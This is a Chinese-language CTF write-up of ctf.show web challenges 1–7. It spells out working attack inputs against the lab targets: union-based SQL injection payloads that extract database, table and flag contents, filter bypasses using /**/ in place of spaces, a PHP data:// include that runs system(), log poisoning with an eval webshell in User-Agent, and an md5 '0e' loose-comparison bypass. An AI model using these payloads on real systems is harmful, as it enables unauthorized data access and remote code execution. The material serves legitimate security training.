web签到题

题目

web签到题

分析

F12 打开 html 文件：

将注释进行 Base64 解码得到 flag。

web2

题目

最简单的SQL注入

分析

看着应该是 SQL 注入题。

先尝试使用 admin 和 123456 登录，发现没有任何回显。看来报错被屏蔽了。

显然 admin 栏如果注入成功则属于字符型注入。尝试使用万能密码作为用户名登录并把后面的密码语句注释掉，填入 admin' or 1=1 #，密码随便填，得到登录成功的回显：

之后通过 “order by+数字” 猜测表的字段数，当猜测的数字小于或等于实际字段数，回显正确，否则报错。向用户名填入 admin' or 1=1 order by 10# 发现无任何回显，说明报错了。依次使用 9、8、7…… 替换上述命令中的 10，当尝试到 3 的时候出现回显，说明该表的字段数为 3：

在获得字段数之后，我们需要测试哪个字段在网站上能够得到回显。这里使用联合查询 union select 语句，向用户名传入 admin' or 1=1 union select 1,2,3#，得到的回显中只有 2，即只有第 2 个字段能够产生回显：

于是我们向第 2 个字段位置输入 database() 以获得当前数据库名，向用户名传入 admin' or 1=1 union select 1,database(),3#，得到数据库名为 web2：

通过 (select group_concat(table_name) from information_schema.tables where table_schema='xxx') 查询数据库 web2 的表名并将所有表名写入一行输出。其中 group_concat() 将所有内容写入一行并输出；information_schema 是 mysql 自带的库，记录了该数据库所有的表名和字段名。向用户名传入 admin' or 1=1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='web2'),3#，得到 web2 的表名 flag 和 user：

通过 (select group_concat(column_name) from information_schema.columns where table_name='xxx') 查询 web2 数据库 flag 表中的字段名并将所有字段名写入一行输出。向用户名传入 admin' or 1=1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flag'),3#，得到字段名 flag：

最后查询 flag 字段的值。向用户名传入 admin' or 1=1 union select 1,(select flag from flag),3#，得到 flag。

参考

ctf.show web2 最简单的SQL注入-0d@y-CSDN
sql回显注入（满满的干货）-iwhattt-博客园
sql注入之万能密码总结-無名之涟-CSDN
SQL注入 （初级篇） 数字形注入与字符型注入区别-笑傲code-CSDN
SQL 注入之 UNION 查询（回显）-z_hunter-CSDN
浅谈SQL注入中的-1‘ union select 1,2,3#-娄不夜-CSDN
SQL注入：union注入学习笔记整理-冇得理想-CSDN
SQL注入如何判断数据库类型-2021！-CSDN
SQL注入常用命令-浅笑996-博客园
史上最全SQL基础知识总结(理论+举例)-Yvonne.Y-CSDN

web3

题目

更简单的web题

分析

代码出现 include，猜测是文件包含漏洞。

通过 data:// 数据流 + php 命令执行函数查询当前工作目录下的内容，使用 hackbar 需要先进行 url 编码：

得到 flag 文件名和首页文件：

?url=data://text/plain,%3C%3Fphp%0Asystem('cat ctf_go_go_go')%3B%0A%3F%3E 打开 flag 文件，得到 flag 内容。

参考

Web_XCTF_WriteUp | Web_php_include-Guanz-博客园

web4

题目

分析

和上一题显示的页面一样，用同样的方法尝试注入：

出现报错：

看来这题相比上一题增加了过滤。

使用 shell_exec 同理：

换个思路，尝试使用一句话木马连接服务器后台。

根据发回的响应包可以确定这题使用的是 nginx 服务器：

看看访问日志先，?url=/var/log/nginx/access.log：

尝试使用日志包含写入一句话木马，往 User-Agent 字段传入一句话木马 <?php @eval($_POST['web4']);?>

传入后的日志增加一条记录：

使用中国蚁剑连接日志文件，在 /var/www/flag.txt 目录找到 flag 内容。

参考

ctfshow_WriteUp | _萌新-Guanz-博客园

web5

题目

分析

php 代码审计题，看看代码:

<?php
error_reporting(0);  // 出错不报错
    
?>
<html lang="zh-CN">  // 中文语言

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, initial-scale=1.0" />
    <title>ctf.show_web5</title>
</head>
<body>
    <center>
    <h2>ctf.show_web5</h2>
    <hr>
    <h3>
    </center>
    <?php
        $flag="";
        $v1=$_GET['v1'];  // get请求传入v1的值
        $v2=$_GET['v2'];  // get请求传入v2的值
        if(isset($v1) && isset($v2)){  // 如果对v1和v2都传入了值
            if(!ctype_alpha($v1)){  // 如果向v1传入的字符串中存在非字母字符
                die("v1 error");  // 输出“v1 error”并退出脚本
            }
            if(!is_numeric($v2)){  // 如果向v2传入的不是数字或数字字符串
                die("v2 error");  // 输出“v2 error”并退出脚本
            }
            if(md5($v1)==md5($v2)){  // 如果v1和v2的md5值在转换为相同类型后相等
                echo $flag;  // 输出flag
            }
        }else{
        
            echo "where is flag?";  // 输出“where is flag?”
        }
    ?>

</body>
</html>

源码对 v1 和 v2 的 md5 值进行松散比较。我们知道不同的明文计算出的 md5 值不可能相同，所以我们只能通过向 v1 传入字母字符串并向 v2 传入数字，使二者计算出的 md5 值转换为数字类型后相等即可。因为 php 会将“数字 + e”开头的字符串解释为科学计数法表示的数字，即 AeB 表示为值 \(A×10^{B}\)，那么以 0e 开头的数字将一律被解释为 0。根据这一特点找到符合条件的 v1 和 v2 进行哈希值碰撞即可。

payload：?v1=QNKCDZO&v2=240610708。

参考

PHP弱类型比较(松散比较)方面的漏洞-日暮途远.-CSDN
常见的MD5碰撞：md5值为0e开头-烟雨天青色-CSDN

web6

题目

分析

又是一道 sql 注入题，尝试万能密码 admin' or 1=1 # 注入用户名，密码随意，得到回显：

看来被过滤了，尝试了多种万能密码都得到相同的回显。

多次尝试绕过后，发现存在空格过滤，我们通过 admin'/**/or/**/1=1/**/# 完全替代空格对空格进行绕过：

之后的操作类似于 web2，我们从 admin'/**/or/**/1=1/**/order/**/by/**/10# 开始递减，尝试到 admin'/**/or/**/1=1/**/order/**/by/**/3# 时得到回显，说明该表的字段数为 3：

我们再向用户名传入 admin'/**/or/**/1=1/**/union/**/select/**/1,2,3#，在第 2 个字段得到回显：

向用户名传入 admin'/**/or/**/1=1/**/union/**/select/**/1,database(),3#，得到数据库名为 web2：

向用户名传入 admin'/**/or/**/1=1/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='web2'),3#，得到 web2 的表名 flag 和 user：

向用户名传入 admin'/**/or/**/1=1/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),3#，得到字段名 flag：

向用户名传入 admin'/**/or/**/1=1/**/union/**/select/**/1,(select/**/flag/**/from/**/flag),3#，得到 flag 内容。

参考

千方百技第六期|MySQL注入绕过思路分享-安全玻璃盒_杭州孝道科技-FreeBuf网络安全行业门户
ctfshow_WriteUp | WEB-Guanz-博客园

web7

题目

分析

依次点击查看三篇文章，发现 url 分别为 index.php?id=1 index.php?id=2 index.php?id=3：

尝试将 id 值改为 10000 和 -1，页面正常显示，猜测对 id 的值存在 sql 注入：

使用万能密码，对 id 传入值 ?id=1 or 1=1，发现存在过滤：

不会又是过滤空格吧？试试：

（邪魅一笑

查查字段数。还是从 ?id=1/**/or/**/1=1/**/order/**/by/**/10 开始递减，尝试到 ?id=1/**/or/**/1=1/**/order/**/by/**/3 时显示三篇文章内容，说明该表的字段数为 3：

看看回显位置。传入 ?id=1/**/or/**/1=1/**/union/**/select/**/1,2,3，在字段 2、3 的位置均得到回显：

我们选择向字段 2 的位置进行注入。传入 ?id=1/**/or/**/1=1/**/union/**/select/**/1,database(),3，得到数据库名为 web7：

向 id 继续传入 ?id=1/**/or/**/1=1/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema="web7"),3，得到 web7 的三个表名 flag,page,user：

这里的 table_schema 赋为 'web7' 时无法显示，需要用双引号包裹，猜测是存在单引号过滤。

向 id 传入值 ?id=1/**/or/**/1=1/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="flag"),3，得到字段名 flag：

继续传入 ?id=1/**/or/**/1=1/**/union/**/select/**/1,(select/**/flag/**/from/**/flag),3，得到 flag 内容。